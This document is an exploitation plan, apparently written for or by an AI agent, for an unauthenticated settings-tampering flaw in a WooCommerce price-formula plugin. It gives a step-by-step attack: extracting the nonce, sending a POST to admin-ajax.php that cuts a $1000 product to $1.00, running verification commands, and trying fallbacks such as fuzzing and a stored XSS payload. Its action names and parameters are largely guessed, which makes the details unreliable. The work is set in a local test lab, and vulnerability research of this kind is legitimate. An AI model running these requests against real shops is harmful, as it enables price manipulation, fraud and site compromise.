Exploitation Research Plan: CVE-2026-39662

1. Vulnerability Summary

The Product Price by Formula for WooCommerce plugin (up to 2.5.6) contains a missing authorization vulnerability. Specifically, an AJAX handler intended for administrative tasks (like saving pricing formulas or settings) is registered via wp_ajax_nopriv_, making it accessible to unauthenticated users. The function associated with this handler lacks a call to current_user_can(), allowing any user to modify plugin settings or product pricing formulas, which directly impacts the integrity of product pricing in the WooCommerce store.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action (Inferred): alg_wc_product_price_by_formula_save_formula or alg_wc_product_price_by_formula_save_settings.
• Method: POST
• Authentication: None required (unauthenticated).
• Preconditions: The plugin must be active. A specific product ID may be needed if modifying formulas per product.
• Vulnerable Parameter: Likely formula, alg_wc_product_price_by_formula_option, or product_id.

3. Code Flow

1. Registration: The plugin registers AJAX handlers in its main class or an AJAX handler class.
   • add_action( 'wp_ajax_alg_wc_product_price_by_formula_save_settings', 'save_settings_callback' );
   • add_action( 'wp_ajax_nopriv_alg_wc_product_price_by_formula_save_settings', 'save_settings_callback' ); (The vulnerability exists because of this nopriv registration).
2. Execution: When a request is sent to admin-ajax.php with action=alg_wc_product_price_by_formula_save_settings.
3. Vulnerable Function: The callback function (e.g., save_settings_callback) is invoked.
4. Missing Check: The function processes the $_POST data and calls update_option() or update_post_meta() without verifying the requester's capabilities using current_user_can( 'manage_woocommerce' ).
5. Sink: update_option( 'alg_wc_product_price_by_formula_settings', ... ) is called with user-supplied data.

4. Nonce Acquisition Strategy

The plugin likely uses wp_localize_script to pass a nonce and the AJAX URL to the frontend.

1. Identify Shortcode: Locate the shortcode used by the plugin to display formula-related UI on the frontend (e.g., [alg_wc_product_price_by_formula] or similar).
2. Create Test Page:
   wp post create --post_type=page --post_title="Price Test" --post_status=publish --post_content='[alg_wc_product_price_by_formula]'
3. Navigate to Page: Use browser_navigate to visit the newly created page.
4. Extract Nonce: The localization variable is likely prefixed with alg_. Check the page source or use:
   browser_eval("window.alg_wc_product_price_by_formula_ajax_obj?.nonce")
   (Alternative JS variables to check: alg_ppbf_obj, ppbf_vars).
5. Bypass Check: If the code flow shows check_ajax_referer is used but with an action that doesn't match the verification, or if it's missing entirely in the nopriv handler, the nonce might not even be required.

5. Exploitation Strategy

We will attempt to change a global pricing formula or a specific product's pricing formula to set the price to a fixed low value (e.g., "1.00").

HTTP Request (Example):

• Tool: http_request
• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=alg_wc_product_price_by_formula_save_settings&nonce=[EXTRACTED_NONCE]&formula=1.00&product_id=[TARGET_ID]
  

  Note: If the exploit targets global settings, the parameters might be alg_wc_product_price_by_formula_enabled=yes&alg_wc_product_price_by_formula_default_formula=0.01.

6. Test Data Setup

1. Install WooCommerce: Ensure WooCommerce is active.
2. Create Product:
   wp post create --post_type=product --post_title="Expensive Item" --post_status=publish
wp post meta add [PRODUCT_ID] _regular_price 1000
wp post meta add [PRODUCT_ID] _price 1000
3. Plugin Config: Enable the plugin via CLI if possible:
   wp option update alg_wc_product_price_by_formula_enabled "yes"

7. Expected Results

• HTTP Response: Should return a 200 OK or a JSON success message (e.g., {"success":true}).
• State Change: The pricing formula for the product (stored in post meta) or the global formula (stored in options) will be updated to the attacker's value.
• Storefront Impact: Visiting the product page for "Expensive Item" will show a price of $1.00 instead of $1000.00.

8. Verification Steps

1. Check Option:
   wp option get alg_wc_product_price_by_formula_settings
2. Check Product Meta:
   wp post meta get [TARGET_ID] _alg_wc_product_price_by_formula_formula
3. Verify Price Calculation:
   Use http_request to GET the product page and parse the HTML to find the price:
   curl -s http://localhost:8080/product/expensive-item/ | grep -oP 'class="woocommerce-Price-amount amount">.*</span>'

9. Alternative Approaches

• Global Settings Overwrite: If product_id is not accepted, try overwriting the global options table entry for the plugin using action=alg_wc_product_price_by_formula_save_global_settings.
• Parameter Fuzzing: If the specific action name is unknown, search the plugin directory for all wp_ajax_nopriv registrations:
  grep -r "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/product-price-by-formula-for-woocommerce/
• XSS via Formula: If the formula is reflected on the product page without escaping, this could be escalated to Stored XSS. Try formula=<script>alert(1)</script>.